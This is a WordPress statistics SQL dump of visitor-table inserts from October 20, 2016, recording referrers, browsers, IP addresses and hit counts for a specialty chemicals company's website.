INSERT INTO `wp_statistics_visitor` VALUES (7858, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.249.114.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7859, '2016-10-20', 'https://www.provisov.net/', 'Opera', 'Windows', '9.0', '', '46.118.118.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7860, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/specialty-products/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7861, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '223.207.251.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7862, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.254.136.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7863, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.71.38.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7864, '2016-10-20', 'https://www.bing.com/search?q=miller-stephenson&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '207.230.213.146', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7865, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.187.161.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7866, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '159.205.199.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7867, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.103.86.192', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7868, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.202.95.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7869, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.119.96.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7870, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.187.211.83', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7871, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.203.105.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7872, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '168.1.53.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7873, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.193.72.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7874, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.162.185.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7875, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '223.207.248.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7876, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '42.201.134.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7877, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.42.111.31', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7878, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.86.157.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7879, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.201.93.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7880, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.204.39.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7881, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.120.168.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7882, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.156.120.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7883, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.135.170.179', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7884, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.43.144.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7885, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.39.11.146', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7886, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.200.169.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7887, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.53.108.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7888, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.98.44.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7889, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.8.107.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7890, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.136.85.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7891, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.253.16.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7892, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.81.11.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7893, '2016-10-20', 'https://r.search.yahoo.com/_ylt=A0LEVz.g.whY1IcA3HTBGOd_;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477012512/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=sksTNjDoUAf.AzPuWoKmJ1XGBXs-', 'Safari', 'iPad', '10.0', '', '71.60.141.35', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7894, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.198.211.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7895, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.55.3.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7896, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.23.50.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7897, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.92.3.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7898, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.126.185.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7899, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '48.0.2564.109', '', '206.16.224.136', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7900, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjGjJLr8enPAhWFgmkKHbUUAV0YABAA&sig=AOD64_0vZjsTpdAWdbHLz1hllJaHDgw2HQ&rct=j&q=&ved=0ahUKEwjK447r8enPAhWo8YMKHZq9BVcQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '147.105.3.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7901, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.230.137.8', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7902, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.82.200.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7903, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.85.187.162', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7904, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.245.83.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7905, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.84.237.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7906, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.105.166.103', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7907, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/', 'MSIE', 'Windows', '11.0', '', '138.162.0.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7908, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjL8Ka88unPAhUIRCYKHZbbCxMQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '98.175.225.15', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7909, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.27.63.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7910, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.87.232.188', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7911, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.117.242.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7912, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.144.185.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7913, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.33.140.238', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7914, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.82.78.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7915, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.176.138.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7916, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.59', '', '12.0.125.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7917, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.192.5.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7918, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.249.219.164', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7919, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.242.190.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7920, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.153.7.182', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7921, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.128.160.198', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7922, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.29.170.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7923, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '151.252.95.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7924, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.144.32.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7925, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.4.165.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7926, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.200.154.86', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7927, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.6.174.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7928, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.245.177.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7929, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.95.162.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7930, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.96.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7931, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.36.98.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7932, '2016-10-20', 'https://www.miller-stephenson.com/ptfe-release-agent/', 'MSIE', 'Windows', '9.0', '', '182.118.21.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7933, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.102.131.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7934, '2016-10-20', 'https://www.miller-stephenson.com/ptfe-release-agent/', 'MSIE', 'Windows', '9.0', '', '182.118.21.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7935, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '128.111.82.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7936, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.206.50.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7937, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.220.106.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7938, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.49.250.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7939, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.113.207.106', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7940, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '10.130.106.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7941, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.189.107.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7942, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.171.181.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7943, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.229.10', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7944, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.57.245.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7945, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.191.92.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7946, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.167.100.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7947, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.239.188.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7948, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '184.188.106.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7949, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.0.47.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7950, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.9.23.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7951, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.158.197.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7952, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.180.177.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7953, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.39.78.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7954, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.183.124.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7955, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '71.238.127.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7956, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.54.203.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7957, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&sqi=2&ved=0ahUKEwj6_vWc9unPAhUll1QKHfQUC_YQ_BcIfzAO&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.cGw', 'MSIE', 'Windows', '11.0', '', '71.189.46.20', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7958, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.228.71.186', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7959, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.135.194.125', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7960, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '171.96.167.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7961, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.156.21.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7962, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.167.226.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7963, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '162.212.174.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7964, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '168.187.238.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7965, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.193.39.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7966, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.248.81.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7967, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.226.68.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7968, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.198.118.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7969, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.237.33.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7970, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.176.121.47', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7971, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiLj6WN9-nPAhVHW4YKHa5UBLEYABAA&sig=AOD64_2y60oFedzW0HjnbplGtX0g4nM-6g&rct=j&q=&ved=0ahUKEwjGh6GN9-nPAhVDSCYKHULjACoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.57.81', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7972, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiLj6WN9-nPAhVHW4YKHa5UBLEYABAA&sig=AOD64_2y60oFedzW0HjnbplGtX0g4nM-6g&rct=j&q=&ved=0ahUKEwjGh6GN9-nPAhVDSCYKHULjACoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.57.78', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7973, '2016-10-20', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.57.80', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7974, '2016-10-20', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.57.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7975, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.227.209.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7976, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/', 'MSIE', 'Windows', '11.0', '', '132.3.57.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7977, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.100.53.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7978, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.137.214.33', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7979, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '206.210.125.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7980, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.3.243.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7981, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.141.121.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7982, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '205.155.65.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7983, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.212.72.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7984, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.242.236.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7985, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.97.226.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7986, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.231.162.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7987, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.183.125.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7988, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.118.93.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7989, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.196.28.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7990, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.221.33.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7991, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '64.201.75.163', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7992, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.214.218.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7993, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.131.30.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7994, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.198.103.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7995, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.149.88.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7996, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.202.115.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7997, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.46.235.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7998, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.136.5.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7999, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.120.104.248', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8000, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '38.104.6.22', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8001, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.73.15.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8002, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.166.183.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8003, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.28.163.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8004, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.221.202.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8005, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.64', '', '5.35.25.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8006, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.128.246.166', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8007, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.230.58.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8008, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.234.40.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8009, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.37.168.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8010, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.219.49.14', '000', 2, 0); 
